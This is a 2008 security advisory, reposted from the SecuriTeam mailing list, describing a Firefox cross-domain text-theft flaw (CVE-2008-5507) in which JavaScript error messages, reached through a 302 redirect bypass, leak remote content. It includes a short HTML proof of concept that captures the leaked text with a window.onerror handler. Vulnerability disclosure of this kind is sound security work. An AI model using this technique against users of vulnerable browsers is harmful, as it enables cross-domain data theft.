Sunday, December 21, 2008

[NEWS] Firefox Cross-Domain Text Theft

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Firefox Cross-Domain Text Theft
------------------------------------------------------------------------


SUMMARY

A vulnerability in the way Firefox parses Javascript code (through a src
tag) without properly restricting it to the same domain allows attackers
to access information that is outside their domain restriction, which in
turn can be used to preform cross-domain theft.

DETAILS

Firefoxes 2.0.0.19 and 3.0.5 fix a cross-domain theft of textual data. The
theft is via cross-domain information leaks in JavaScript error messages
for scripts executed via <script src="remote_domain.org">. The JavaScript
error messages are made available to the window.onerror handler. In some
cases, JavaScript error messages can contain pieces of text from the
remote domain as part of the error message, e.g. "blah is not defined".
This permits certain textual constructs to be stolen cross-domain.

The broader issue was fixed in Firefox 3.0. However this fix was not
complete. The fix could be dodged by using another instance of the "302
redirect trick". It was possible to cause the browser to believe a remote
script was in fact local, and therefore continue to reveal JavaScript
error messages.

Proof of concept:
<html>
<body>
You should see an alert box containing a (potentially) sensitive many-bits
hex string stolen cross-domain.
<script>
window.onerror = function(message, uri, line) {
var fullMessage = message + "\n at " + uri + ": " + line;
alert(fullMessage);
return false;
}
</script>
<script src="../redir?url=http://vsftpd.beasts.org/steal_me/hex.txt">
</script>
</body>
</html>

CVE Information:
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5507>
CVE-2008-5507


ADDITIONAL INFORMATION

The information has been provided by <mailto:scarybeasts@gmail.com> Chris
Evans.
The original article can be found at:
<http://scary.beasts.org/security/CESA-2008-011.html>
http://scary.beasts.org/security/CESA-2008-011.html

========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

No comments:

Post a Comment